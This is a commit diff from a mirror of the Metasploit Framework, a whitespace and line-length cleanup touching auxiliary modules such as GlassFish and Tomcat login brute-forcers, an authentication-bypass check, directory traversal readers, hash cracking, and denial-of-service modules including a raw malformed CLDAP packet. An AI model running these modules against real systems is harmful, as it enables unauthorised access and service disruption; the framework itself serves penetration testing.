infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Msftidy run against a bunch of whitespace violations, a few line too longs. 

git-svn-id: file:///home/svn/framework3/trunk@13962 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Tod Beardsley 2011-10-17 02:42:01 +00:00
parent ea2c9d1a46
commit e9461c766e
48 changed files with 990 additions and 892 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
modules/auxiliary/admin/http/tomcat_utf8_traversal.rb
View File

@ -109,11 +109,11 @@ class Metasploit3 < Msf::Auxiliary
print_good("#{f}")
end
else
print_good("No File(s) found")
print_good("No File(s) found")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
end

4
modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb
View File

@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
bug which is implemented in module tomcat_utf8_traversal CVE 2008-2938.
This module simply tests for the same bug with Trend Micro specific settings.
Note that in the Trend Micro appliance, /etc/shadow is not used and therefore
password hashes are stored and anonymously accessible in the passwd file.
password hashes are stored and anonymously accessible in the passwd file.
},
'References' =>
[
@ -106,7 +106,7 @@ class Metasploit3 < Msf::Auxiliary
print_good("#{f}")
end
else
print_good("No File(s) found")
print_good("No File(s) found")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout

27
modules/auxiliary/admin/oracle/oraenum.rb
View File

@ -108,10 +108,25 @@ class Metasploit3 < Msf::Auxiliary
end
print_status("\tUTL Directory Access is set to #{vparm["utl_file_dir"]}") if vparm["utl_file_dir"] != " "
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "UTL_DIR: #{ vparm["utl_file_dir"]}") if not vparm["utl_file_dir"]#.empty?
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "UTL_DIR: #{ vparm["utl_file_dir"]}"
) if not vparm["utl_file_dir"]#.empty?
print_status("\tAudit log is saved at #{vparm["audit_file_dest"]}")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Audit Log Location: #{ vparm["audit_file_dest"]}") if not vparm["audit_file_dest"]#.empty?
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Audit Log Location: #{ vparm["audit_file_dest"]}"
) if not vparm["audit_file_dest"]#.empty?
end
#-------------------------------------------------------
@ -419,7 +434,13 @@ class Metasploit3 < Msf::Auxiliary
accrcrd = l.split(",")
if accts.has_key?(accrcrd[2])
print_status("\tDefault pass for account #{accrcrd[0]} is #{accrcrd[1]} ")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account with Default Password #{accrcrd[0]} is #{accrcrd[1]}")
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Account with Default Password #{accrcrd[0]} is #{accrcrd[1]}")
end
end
end

2
modules/auxiliary/admin/oracle/tnscmd.rb
View File

@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
disconnect
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
print_error e.message
print_error e.message
rescue ::Timeout::Error, ::Errno::EPIPE,Errno::ECONNRESET => e
print_error e.message
end

2
modules/auxiliary/admin/scada/igss_exec_17.rb
View File

@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
'References' =>
[
[ 'CVE', '2011-1566'],
[ 'OSVDB', '72349'],
[ 'OSVDB', '72349'],
[ 'URL', 'http://aluigi.org/adv/igss_8-adv.txt' ],
],
'DisclosureDate' => 'Mar 21 2011'))

2
modules/auxiliary/admin/smb/check_dir_file.rb
View File

@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
of SMB hosts for the presence of a known file or directory.
An example would be to scan all systems for the presence of
antivirus or known malware outbreak. Typically you must set
RPATH, SMBUser, SMBDomain and SMBPass to operate correctly.
RPATH, SMBUser, SMBDomain and SMBPass to operate correctly.
},
'Author' =>
[

4
modules/auxiliary/admin/vnc/realvnc_41_bypass.rb
View File

@ -23,10 +23,10 @@ class Metasploit3 < Msf::Auxiliary
in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy
listener on LPORT and proxies to the target server
The AUTOVNC option requires that vncviewer be installed on
The AUTOVNC option requires that vncviewer be installed on
the attacking machine.
},
'Author' =>
'Author' =>
[
'hdm', #original msf2 module
'TheLightCosine <thelightcosine[at]gmail.com>'

24
modules/auxiliary/analyze/jtr_crack_fast.rb
View File

@ -24,8 +24,8 @@ class Metasploit3 < Msf::Auxiliary
'Description' => %Q{
This module uses John the Ripper to identify weak passwords that have been
acquired as hashed files (loot) or raw LANMAN/NTLM hashes (hashdump). The goal
of this module is to find trivial passwords in a short amount of time. To
crack complex passwords or use large wordlists, John the Ripper should be
of this module is to find trivial passwords in a short amount of time. To
crack complex passwords or use large wordlists, John the Ripper should be
used outside of Metasploit. This initial version just handles LM/NTLM credentials
from hashdump and uses the standard wordlist and rules.
},
@ -40,10 +40,10 @@ class Metasploit3 < Msf::Auxiliary
begin
# Seed the wordlist with usernames, passwords, and hostnames
seed = []
seed = []
myworkspace.hosts.find(:all).each {|o| seed << john_expand_word( o.name ) if o.name }
myworkspace.creds.each do |o|
myworkspace.creds.each do |o|
seed << john_expand_word( o.user ) if o.user
seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
end
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
# Append the standard JtR wordlist as well
::File.open(john_wordlist_path, "rb") do |fd|
wordlist.write fd.read(fd.stat.size)
wordlist.write fd.read(fd.stat.size)
end
# Close the wordlist to prevent sharing violations (windows)
@ -74,7 +74,7 @@ class Metasploit3 < Msf::Auxiliary
if smb_hashes.length > 0
cracked_ntlm = {}
cracked_lm = {}
added = []
added = []
# Crack this in LANMAN format using wordlist mode with tweaked rules
john_crack(hashlist.path, :wordlist => wordlist.path, :rules => 'single', :format => 'lm')
@ -108,7 +108,7 @@ class Metasploit3 < Msf::Auxiliary
cracked_ntlm.values.each {|w| if not added.include?(w); tfd.write( w + "\n" ); added << w; end }
tfd.close
# Crack this in NTLM format
# Crack this in NTLM format
john_crack(hashlist.path, :wordlist => wordlist.path, :rules => 'single', :format => 'nt')
# Crack this in NTLM format using various incremntal modes
@ -130,11 +130,11 @@ class Metasploit3 < Msf::Auxiliary
# Store the cracked results based on user_id => cred.id
cracked_ntlm.each_pair do |k,v|
next if not k =~ /^cred_(\d+)/m
cid = $1.to_i
cid = $1.to_i
cred_find = smb_hashes.select{|x| x[:id] == cid}
next if cred_find.length == 0
cred = cred_find.first
cred = cred_find.first
print_good("Cracked: #{cred.user}:#{v} (#{cred.service.host.address}:#{cred.service.port})")
report_auth_info(
@ -146,10 +146,10 @@ class Metasploit3 < Msf::Auxiliary
:source_id => cred[:id],
:source_type => 'cracked'
)
end
end
end
# XXX: Enter other hash types here (shadow, etc)
# XXX: Enter other hash types here (shadow, etc)
rescue ::Timeout::Error
ensure
@ -157,7 +157,7 @@ class Metasploit3 < Msf::Auxiliary
hashlist.close rescue nil
::File.unlink(wordlist.path) rescue nil
::File.unlink(hashlist.path) rescue nil
end
end
end
end

7
modules/auxiliary/bnat/bnat_router.rb
View File

@ -18,9 +18,9 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'BNAT Router',
'Version' => '$Revision$',
'Description' => %q{
This module will properly route BNAT traffic and allow for connections to be
This module will properly route BNAT traffic and allow for connections to be
established to machines on ports which might not otherwise be accessible.},
'Author' =>
'Author' =>
[
'bannedit',
'Jonathan Claudius',
@ -152,4 +152,5 @@ class Metasploit3 < Msf::Auxiliary
end
return target_mac
end
end
end

9
modules/auxiliary/bnat/bnat_scan.rb
View File

@ -20,10 +20,10 @@ class Metasploit3 < Msf::Auxiliary
'Version' => '$Revision$',
'Description' => %q{
This module is a scanner which can detect Bad NAT (network address translation)
implementations, which could result in a inability to reach ports on remote
machines. Typically, these ports will appear in nmap scans as 'filtered'.
implementations, which could result in a inability to reach ports on remote
machines. Typically, these ports will appear in nmap scans as 'filtered'.
},
'Author' =>
'Author' =>
[
'bannedit',
'Jonathan Claudius <jclaudius[at]trustwave.com>',
@ -98,4 +98,5 @@ class Metasploit3 < Msf::Auxiliary
print_status "[BNAT Response] Request: #{ip} Response: #{synack[:ip]} Port: #{synack[:port]}"
end
end
end
end

8
modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb
View File

@ -19,11 +19,11 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'ISC DHCP Zero Length ClientID Denial of Service Module',
'Description' => %q{
This module performs a Denial of Service Attack against the ISC DHCP server,
versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1. It sends out a DHCP Request
'Description' => %q{
This module performs a Denial of Service Attack against the ISC DHCP server,
versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1. It sends out a DHCP Request
message with a 0-length client_id option for an IP address on the appropriate range
for the dhcp server. When ISC DHCP Server tries to hash this value it exits
for the dhcp server. When ISC DHCP Server tries to hash this value it exits
abnormally.
},
'Author' =>

20
modules/auxiliary/dos/wireshark/cldap.rb
View File

@ -20,8 +20,8 @@ class Metasploit3 < Msf::Auxiliary
super( update_info(info,
'Name' => 'Wireshark CLDAP Dissector DOS',
'Description' => %q{
This module causes infinite recursion to occur within the
CLDAP dissector by sending a specially crafted UDP packet.
This module causes infinite recursion to occur within the
CLDAP dissector by sending a specially crafted UDP packet.
},
'Author' => ['joernchen <joernchen[at]phenoelit.de> (Phenoelit)'],
'License' => MSF_LICENSE,
@ -44,14 +44,14 @@ class Metasploit3 < Msf::Auxiliary
def run
connect_udp
cldap_payload = "\x30\x81\xa2\x02\x01\x01\x64\x81\x9c\x04\x00\x30\x81\x97\x30\x81"+
"\x94\x04\x08\x6e\x65\x74\x6c\x6f\x67\x6f\x6e\x31\x81\x87\x04\x81"+
"\x84\x17\x00\x00\x00\xfd\x03\x00\x00\xda\xae\x52\xd0\x2f\xb4\xa9"+
"\x48\x8b\x16\x4e\xbc\x51\xf9\x60\xb4\xc0\x1a\xc0\x18\x0e\x63\x6f"+
"\x6e\x74\x61\x63\x74\x2d\x73\x61\x6d\x62\x61\x34\xc0\x18\x0a\x43"+
"\x4f\x4e\x54\x41\x43\x54\x44\x4f\x4d\x00\x10\x5c\x5c\x43\x4f\x4e"+
"\x54\x41\x43\x54\x2d\x53\x41\x4d\x42\x41\x34\x00\x00\x00\x00\xc0"+
"\x61\x05\x00\x00\x00\xff\xff\xff\xff\x30\x0c\x02\x01\x01\x65\x07"+
"\x0a\x01\x00\x04\x00\x04\x00"
"\x94\x04\x08\x6e\x65\x74\x6c\x6f\x67\x6f\x6e\x31\x81\x87\x04\x81"+
"\x84\x17\x00\x00\x00\xfd\x03\x00\x00\xda\xae\x52\xd0\x2f\xb4\xa9"+
"\x48\x8b\x16\x4e\xbc\x51\xf9\x60\xb4\xc0\x1a\xc0\x18\x0e\x63\x6f"+
"\x6e\x74\x61\x63\x74\x2d\x73\x61\x6d\x62\x61\x34\xc0\x18\x0a\x43"+
"\x4f\x4e\x54\x41\x43\x54\x44\x4f\x4d\x00\x10\x5c\x5c\x43\x4f\x4e"+
"\x54\x41\x43\x54\x2d\x53\x41\x4d\x42\x41\x34\x00\x00\x00\x00\xc0"+
"\x61\x05\x00\x00\x00\xff\xff\xff\xff\x30\x0c\x02\x01\x01\x65\x07"+
"\x0a\x01\x00\x04\x00\x04\x00"
print_status("Sending malformed CLDAP packet to #{rhost}")
udp_sock.put(cldap_payload)
end

2
modules/auxiliary/scanner/discovery/arp_sweep.rb
View File

@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
open_pcap({'SNAPLEN' => 68, 'FILTER' => "arp[6:2] == 0x0002"})
@netifaces = true
if not netifaces_implemented?
if not netifaces_implemented?
print_error("WARNING : Pcaprub is not uptodate, some functionality will not be available")
@netifaces = false
end

2
modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb
View File

@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary
p = PacketFu::Packet.parse(pkt_bytes)
# Don't bother checking if it's an echo reply, since Neighbor Solicitations
# and any other response is just as good.
next unless p.is_ipv6?
next unless p.is_ipv6?
host_addr = p.ipv6_saddr
host_mac = p.eth_saddr
next if host_mac == smac

2
modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb
View File

@ -144,7 +144,7 @@ class Metasploit3 < Msf::Auxiliary
lifetime = 1800
reachable = 0
retrans = 0
[type, code, checksum, hop_limit, flags,
[type, code, checksum, hop_limit, flags,
lifetime, reachable, retrans].pack("CCnCCnNN")
end

470
modules/auxiliary/scanner/http/glassfish_login.rb
View File

@ -1,235 +1,235 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'GlassFish Brute Force Utility',
'Version' => '$Revision$',
'Description' => %q{
This module attempts to login to GlassFish instance using username
and password combindations indicated by the USER_FILE, PASS_FILE,
and USERPASS_FILE options.
},
'Author' =>
[
'Joshua Abraham <jabra[at]rapid7.com>'
],
'References' =>
[
['CVE', '2011-0807'],
['OSVDB', '71948'],
],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(4848),
OptString.new('URI', [true, 'The URI path of the GlassFish Server', '/']),
OptString.new('USERNAME',[true, 'A specific username to authenticate as','admin']),
], self.class)
end
#
# Return GlassFish's edition (Open Source or Commercial) and version (2.x, 3.0, 3.1, 9.x) and
# banner (ex: Sun Java System Application Server 9.x)
#
def get_version(res)
#Extract banner from response
banner = res.headers['Server']
#Default value for edition and glassfish version
edition = 'Commercial'
version = 'Unknown'
#Set edition (Open Source or Commercial)
p = /(Open Source|Sun GlassFish Enterprise Server|Sun Java System Application Server)/
edition = 'Open Source' if banner =~ p
#Set version. Some GlassFish servers return banner "GlassFish v3".
if banner =~ /(GlassFish Server|Open Source Edition) (\d\.\d)/
version = $2
elsif banner =~ /GlassFish v(\d)/ and version.nil?
version = $1
elsif banner =~ /Sun GlassFish Enterprise Server v2/ and version.nil?
version = '2.x'
elsif banner =~ /Sun Java System Application Server 9/ and version.nil?
version = '9.x'
end
print_status("Unsupported version: #{banner}") if version.nil? or version == 'Unknown'
return edition, version, banner
end
def log_success(user,pass)
print_good("#{target_host()} - GlassFish - SUCCESSFUL login for '#{user}' : '#{pass}'")
report_auth_info(
:host => rhost,
:port => rport,
:sname => 'http',
:user => user,
:pass => pass,
:proof => "WEBAPP=\"GlassFish\", VHOST=#{vhost}",
:active => true
)
end
#
# Send GET or POST request, and return the response
#
def send_request(path, method, session='', data=nil, ctype=nil)
headers = {}
headers['Cookie'] = "JSESSIONID=#{session}" if session != ''
headers['Content-Type'] = ctype if ctype != nil
headers['Content-Length'] = data.length if data != nil
res = send_request_raw({
'uri' => path,
'method' => method,
'data' => data,
'headers' => headers,
}, 90)
return res
end
#
# Try to login to Glassfish with a credential, and return the response
#
def try_login(user, pass)
data = "j_username=#{Rex::Text.uri_encode(user.to_s)}&"
data << "j_password=#{Rex::Text.uri_encode(pass.to_s)}&"
data << "loginButton=Login"
path = '/j_security_check'
res = send_request(path, 'POST', '', data, 'application/x-www-form-urlencoded')
return res
end
def try_glassfish_auth_bypass(version)
print_status("Trying GlassFish authentication bypass..")
success = false
if version == '2.x' or version == '9.x'
res = send_request('/applications/upload.jsf', 'get')
p = /<title>Deploy Enterprise Applications\/Modules/
if (res and res.code.to_i == 200 and res.body.match(p) != nil)
success = true
end
else
# 3.0
res = send_request('/common/applications/uploadFrame.jsf', 'get')
p = /<title>Deploy Applications or Modules/
if (res and res.code.to_i == 200 and res.body.match(p) != nil)
success = true
end
end
if success == true
print_good("#{target_host} - GlassFish - SUCCESSFUL authentication bypass")
report_auth_info(
:host => rhost,
:port => rport,
:sname => 'http',
:user => '',
:pass => '',
:proof => "WEBAPP=\"GlassFish\", VHOST=#{vhost}",
:active => true
)
else
print_error("#{target_host()} - GlassFish - Failed authentication bypass")
end
return success
end
def try_glassfish_login(version,user,pass)
success = false
session = ''
res = ''
if version == '2.x' or version == '9.x'
print_status("Trying credential GlassFish 2.x #{user}:'#{pass}'....")
res = try_login(user,pass)
if res and res.code == 302
session = $1 if (res and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /i)
res = send_request('/applications/upload.jsf', 'GET', session)
p = /<title>Deploy Enterprise Applications\/Modules/
if (res and res.code.to_i == 200 and res.body.match(p) != nil)
success = true
end
end
else
print_status("Trying credential GlassFish 3.x #{user}:'#{pass}'....")
res = try_login(user,pass)
if res and res.code == 302
session = $1 if (res and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /i)
res = send_request('/common/applications/uploadFrame.jsf', 'GET', session)
p = /<title>Deploy Applications or Modules/
if (res and res.code.to_i == 200 and res.body.match(p) != nil)
success = true
end
end
end
if success == true
log_success(user,pass)
else
msg = "#{target_host()} - GlassFish - Failed to authenticate login for '#{user}' : '#{pass}'"
print_error(msg)
end
return success, res, session
end
def run_host(ip)
#Invoke index to gather some info
res = send_request('/common/index.jsf', 'GET')
#Abort if res returns nil due to an exception (broken pipe or timeout)
if res.nil?
print_error("Unable to get a response from the server.")
return
end
if res.code.to_i == 302
res = send_request('/login.jsf', 'GET')
end
#Get GlassFish version
edition, version, banner = get_version(res)
target_url = "http://#{rhost.to_s}:#{rport.to_s}/#{datastore['PATH'].to_s}"
print_status("#{target_url} - GlassFish - Attempting authentication")
if (version == '2.x' or version == '9.x' or version == '3.0')
try_glassfish_auth_bypass(version)
end
each_user_pass do |user, pass|
try_glassfish_login(version, user, pass)
end
end
end
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'GlassFish Brute Force Utility',
'Version' => '$Revision$',
'Description' => %q{
This module attempts to login to GlassFish instance using username
and password combindations indicated by the USER_FILE, PASS_FILE,
and USERPASS_FILE options.
},
'Author' =>
[
'Joshua Abraham <jabra[at]rapid7.com>'
],
'References' =>
[
['CVE', '2011-0807'],
['OSVDB', '71948'],
],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(4848),
OptString.new('URI', [true, 'The URI path of the GlassFish Server', '/']),
OptString.new('USERNAME',[true, 'A specific username to authenticate as','admin']),
], self.class)
end
#
# Return GlassFish's edition (Open Source or Commercial) and version (2.x, 3.0, 3.1, 9.x) and
# banner (ex: Sun Java System Application Server 9.x)
#
def get_version(res)
#Extract banner from response
banner = res.headers['Server']
#Default value for edition and glassfish version
edition = 'Commercial'
version = 'Unknown'
#Set edition (Open Source or Commercial)
p = /(Open Source|Sun GlassFish Enterprise Server|Sun Java System Application Server)/
edition = 'Open Source' if banner =~ p
#Set version. Some GlassFish servers return banner "GlassFish v3".
if banner =~ /(GlassFish Server|Open Source Edition) (\d\.\d)/
version = $2
elsif banner =~ /GlassFish v(\d)/ and version.nil?
version = $1
elsif banner =~ /Sun GlassFish Enterprise Server v2/ and version.nil?
version = '2.x'
elsif banner =~ /Sun Java System Application Server 9/ and version.nil?
version = '9.x'
end
print_status("Unsupported version: #{banner}") if version.nil? or version == 'Unknown'
return edition, version, banner
end
def log_success(user,pass)
print_good("#{target_host()} - GlassFish - SUCCESSFUL login for '#{user}' : '#{pass}'")
report_auth_info(
:host => rhost,
:port => rport,
:sname => 'http',
:user => user,
:pass => pass,
:proof => "WEBAPP=\"GlassFish\", VHOST=#{vhost}",
:active => true
)
end
#
# Send GET or POST request, and return the response
#
def send_request(path, method, session='', data=nil, ctype=nil)
headers = {}
headers['Cookie'] = "JSESSIONID=#{session}" if session != ''
headers['Content-Type'] = ctype if ctype != nil
headers['Content-Length'] = data.length if data != nil
res = send_request_raw({
'uri' => path,
'method' => method,
'data' => data,
'headers' => headers,
}, 90)
return res
end
#
# Try to login to Glassfish with a credential, and return the response
#
def try_login(user, pass)
data = "j_username=#{Rex::Text.uri_encode(user.to_s)}&"
data << "j_password=#{Rex::Text.uri_encode(pass.to_s)}&"
data << "loginButton=Login"
path = '/j_security_check'
res = send_request(path, 'POST', '', data, 'application/x-www-form-urlencoded')
return res
end
def try_glassfish_auth_bypass(version)
print_status("Trying GlassFish authentication bypass..")
success = false
if version == '2.x' or version == '9.x'
res = send_request('/applications/upload.jsf', 'get')
p = /<title>Deploy Enterprise Applications\/Modules/
if (res and res.code.to_i == 200 and res.body.match(p) != nil)
success = true
end
else
# 3.0
res = send_request('/common/applications/uploadFrame.jsf', 'get')
p = /<title>Deploy Applications or Modules/
if (res and res.code.to_i == 200 and res.body.match(p) != nil)
success = true
end
end
if success == true
print_good("#{target_host} - GlassFish - SUCCESSFUL authentication bypass")
report_auth_info(
:host => rhost,
:port => rport,
:sname => 'http',
:user => '',
:pass => '',
:proof => "WEBAPP=\"GlassFish\", VHOST=#{vhost}",
:active => true
)
else
print_error("#{target_host()} - GlassFish - Failed authentication bypass")
end
return success
end
def try_glassfish_login(version,user,pass)
success = false
session = ''
res = ''
if version == '2.x' or version == '9.x'
print_status("Trying credential GlassFish 2.x #{user}:'#{pass}'....")
res = try_login(user,pass)
if res and res.code == 302
session = $1 if (res and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /i)
res = send_request('/applications/upload.jsf', 'GET', session)
p = /<title>Deploy Enterprise Applications\/Modules/
if (res and res.code.to_i == 200 and res.body.match(p) != nil)
success = true
end
end
else
print_status("Trying credential GlassFish 3.x #{user}:'#{pass}'....")
res = try_login(user,pass)
if res and res.code == 302
session = $1 if (res and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /i)
res = send_request('/common/applications/uploadFrame.jsf', 'GET', session)
p = /<title>Deploy Applications or Modules/
if (res and res.code.to_i == 200 and res.body.match(p) != nil)
success = true
end
end
end
if success == true
log_success(user,pass)
else
msg = "#{target_host()} - GlassFish - Failed to authenticate login for '#{user}' : '#{pass}'"
print_error(msg)
end
return success, res, session
end
def run_host(ip)
#Invoke index to gather some info
res = send_request('/common/index.jsf', 'GET')
#Abort if res returns nil due to an exception (broken pipe or timeout)
if res.nil?
print_error("Unable to get a response from the server.")
return
end
if res.code.to_i == 302
res = send_request('/login.jsf', 'GET')
end
#Get GlassFish version
edition, version, banner = get_version(res)
target_url = "http://#{rhost.to_s}:#{rport.to_s}/#{datastore['PATH'].to_s}"
print_status("#{target_url} - GlassFish - Attempting authentication")
if (version == '2.x' or version == '9.x' or version == '3.0')
try_glassfish_auth_bypass(version)
end
each_user_pass do |user, pass|
try_glassfish_login(version, user, pass)
end
end
end

2
modules/auxiliary/scanner/http/http_put.rb
View File

@ -35,7 +35,7 @@ class Metasploit4 < Msf::Auxiliary
'sinn3r',
],
'License' => MSF_LICENSE,
'References' =>
'References' =>
[
[ 'OSVDB', '397'],
],

2
modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb
View File

@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'Majordomo2 _list_file_get() Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability present in
the _list_file_get() function of Majordomo2 (help function). By default, this
the _list_file_get() function of Majordomo2 (help function). By default, this
module will attempt to download the Majordomo config.pl file.
},
'Author' => ['Nikolas Sotiriu'],

5
modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb
View File

@ -24,7 +24,10 @@ class Metasploit3 < Msf::Auxiliary
super(
'Name' => 'SAP BusinessObjects User Bruteforcer',
'Version' => '$Revision$',
'Description' => 'This module simply attempts to bruteforce SAP BusinessObjects users. The dswsbobje interface is only used to verify valid credentials for CmcApp. Therefore, any valid credentials that have been identified can be leveraged by logging into CmcApp.',
'Description' => 'This module attempts to bruteforce SAP BusinessObjects users.
The dswsbobje interface is only used to verify valid credentials for CmcApp.
Therefore, any valid credentials that have been identified can be leveraged by
logging into CmcApp.',
'References' =>
[
# General

20
modules/auxiliary/scanner/http/tomcat_mgr_login.rb
View File

@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
Opt::RPORT(8080),
OptString.new('URI', [true, "URI for Manager login. Default is /manager/html", "/manager/html"]),
OptString.new('URI', [true, "URI for Manager login. Default is /manager/html", "/manager/html"]),
OptPath.new('USERPASS_FILE', [ false, "File containing users and passwords separated by space, one pair per line",
File.join(Msf::Config.install_root, "data", "wordlists", "tomcat_mgr_default_userpass.txt") ]),
OptPath.new('USER_FILE', [ false, "File containing users, one per line",
@ -78,21 +78,21 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
begin
res = send_request_cgi({
'uri' => "#{datastore['URI']}",
'method' => 'GET'
'uri' => "#{datastore['URI']}",
'method' => 'GET'
}, 25)
http_fingerprint({ :response => res })
rescue ::Rex::ConnectionError => e
vprint_error("http://#{rhost}:#{rport}#{datastore['URI']} - #{e}")
vprint_error("http://#{rhost}:#{rport}#{datastore['URI']} - #{e}")
return
end
if not res
vprint_error("http://#{rhost}:#{rport}#{datastore['URI']} - No response")
vprint_error("http://#{rhost}:#{rport}#{datastore['URI']} - No response")
return
end
if res.code != 401
vprint_error("http://#{rhost}:#{rport} - Authorization not requested")
vprint_error("http://#{rhost}:#{rport} - Authorization not requested")
return
end
@ -110,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary
begin
res = send_request_cgi({
'uri' => "#{datastore['URI']}",
'uri' => "#{datastore['URI']}",
'method' => 'GET',
'headers' =>
{
@ -118,7 +118,7 @@ class Metasploit3 < Msf::Auxiliary
}
}, 25)
unless (res.kind_of? Rex::Proto::Http::Response)
vprint_error("http://#{rhost}:#{rport}#{datastore['URI']} not responding")
vprint_error("http://#{rhost}:#{rport}#{datastore['URI']} not responding")
return :abort
end
return :abort if (res.code == 404)
@ -132,7 +132,7 @@ class Metasploit3 < Msf::Auxiliary
end
rescue ::Rex::ConnectionError => e
vprint_error("http://#{rhost}:#{rport}#{datastore['URI']} - #{e}")
vprint_error("http://#{rhost}:#{rport}#{datastore['URI']} - #{e}")
return :abort
end
@ -150,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary
return :next_user
else
vprint_error("http://#{rhost}:#{rport}#{datastore['URI']} [#{srvhdr}] [Tomcat Application Manager] failed to login as '#{user}'")
vprint_error("http://#{rhost}:#{rport}#{datastore['URI']} [#{srvhdr}] [Tomcat Application Manager] failed to login as '#{user}'")
return
end
end

7
modules/auxiliary/scanner/http/vmware_server_dir_trav.rb
View File

@ -23,7 +23,12 @@ class Metasploit3 < Msf::Auxiliary
super(
'Name' => 'VMware Server Directory Transversal Vulnerability',
'Version' => '$Revision$',
'Description' => 'This modules exploits the VMware Server Directory traversal vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before 2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5 allows remote attackers to read arbitrary files. Common VMware server ports 80/8222 and 443/8333 SSL. If you want to download the entire VM, check out the gueststealer tool.',
'Description' => 'This modules exploits the VMware Server Directory traversal
vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before
2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5
allows remote attackers to read arbitrary files. Common VMware server ports
80/8222 and 443/8333 SSL. If you want to download the entire VM, check out
the gueststealer tool.',
'Author' => 'CG' ,
'License' => MSF_LICENSE,
'Version' => '$Revision$',

4
modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb
View File

@ -97,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
def parse_reply(pkt)
def parse_reply(pkt)
@results ||= {}
# Ignore "empty" packets
@ -108,6 +108,6 @@ class Metasploit3 < Msf::Auxiliary
end
return pkt[0][333,12] if pkt[0][6,4] == "\x01\x06\xff\xf9"
end
end
end

1
modules/auxiliary/scanner/mssql/mssql_hashdump.rb
View File

@ -137,7 +137,6 @@ class Metasploit3 < Msf::Auxiliary
end
filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_sqlhashes.txt"
store_loot(hashtype, "text/plain", datastore['RHOST'], tbl.to_csv, filename, "MS SQL Hashes", this_service)
end
#Grabs the user tables depending on what Version of MSSQL

503
modules/auxiliary/scanner/oracle/isqlplus_login.rb
View File

@ -1,253 +1,250 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::AuthBrute
def initialize
super(
